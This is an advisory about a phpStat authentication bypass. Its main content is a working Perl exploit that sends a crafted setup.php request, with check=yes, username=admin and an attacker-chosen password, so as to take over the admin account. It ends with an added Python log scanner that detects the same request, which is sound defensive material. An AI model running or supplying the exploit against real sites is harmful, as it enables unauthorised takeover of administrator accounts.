phpStat Authentication Bypass Vulnerability
Source: AlphaST.Com  Author: Sirus-v  Published: 2005-06-01

phpStat Authentication Bypass Vulnerability (Exploit, Setup.PHP)

Summary
phpStat is an "IM statistics generator, made using PHP. Along basic statistics it also organizes conversations for future access by their rightful owners."

phpStat is vulnerable to an authentication bypass. The following exploit lets you verify whether your system is vulnerable.

Credit:
The information has been provided by A l p h a _ P r o g r a m m e r ( Sirus-v ).

Details
Vulnerable Systems:
* phpStat version 1.5 and prior

Exploit:
#!/usr/bin/perl
###################################
#T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
###################################
# EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability
#
#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v )
#E-Mail : Alpha_Programmer@Yahoo.com
#
#This Xpl Change Admin's Pass in This Portal !!
#Discovered by: SoulBlack
#
#Vulnerable Version : phpStat 1.5
#
###################################
# Gr33tz To => mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com
#
# So Iranian Hacking & Security Teams :
#
# Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT
###################################


use IO::Socket;

if (@ARGV < 3)
{
print "\n=====================\n";
print " \n -- Exploit By Alpha Programmer --\n\n";
print " Trap-Set UnderGrounD Hacking Team \n\n";
print " Usage: <T4rg3t> <DIR> <Password>\n\n";
print "=====================\n\n";
print "Examples:\n\n";
print " phpStat.pl www.Site.com /phpstat/ 12345\n";
exit();
}

my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "C0nn3cted\n";

$http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n\n\n\n";

print "[+]Sending H3ll Packet ...\n";
print $remote $http;
sleep(1);
print "[+]Wait For Authentication Bypass ...\n";
sleep(100);
while (<$remote>)
{
}
print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n";
print "[+]User: admin\n";
print "[+]Pass: $ARGV[2]";
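
The request the script above sends (setup.php with check=yes, username and password in the query string) leaves a recognisable line in the web server's access log. The following detector is an added example, not part of the original advisory or of phpStat; it assumes Apache/nginx combined log format, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def match_setup_request(line):
    """Return a finding dict if the line has the setup.php request shape, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # Decode and lowercase so setup%2Ephp or SETUP.PHP is not missed.
    if not unquote(url.path).lower().endswith("/setup.php"):
        return None
    # parse_qs percent-decodes names and values; names are lowercased
    # here on purpose to cast a wider net.
    qs = {k.lower(): v for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    if qs.get("check", [""])[0].lower() != "yes":
        return None
    if "username" not in qs or "password" not in qs:
        return None
    # The password value is left out so the report does not copy a credential.
    return {"ip": m["ip"], "time": m["ts"], "method": m["method"],
            "path": unquote(url.path), "username": qs["username"][0],
            "status": int(m["status"])}

def scan(lines):
    """Run the matcher over an iterable of log lines and keep the hits."""
    return [hit for hit in map(match_setup_request, lines) if hit]

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jun/2005:10:12:01 +0000] "GET /phpstat/setup.php?check=yes&username=admin&password=12345 HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [01/Jun/2005:10:13:44 +0000] "GET /phpstat/setup.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jun/2005:10:14:02 +0000] "GET /stats/SETUP.PHP?password=x&username=admin&check=yes HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.4 - - [01/Jun/2005:10:15:30 +0000] "GET /phpstat/index.php?check=yes HTTP/1.1" 200 900 "-" "-"',
    '192.0.2.4 - - [01/Jun/2005:10:16:10 +0000] "GET /phpstat/setup%2Ephp?check=yes&user%6Eame=admin&password=x HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with a 2xx status on a host running phpStat 1.5 or earlier is the case to follow up, since the script's stated effect is a changed admin password.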



 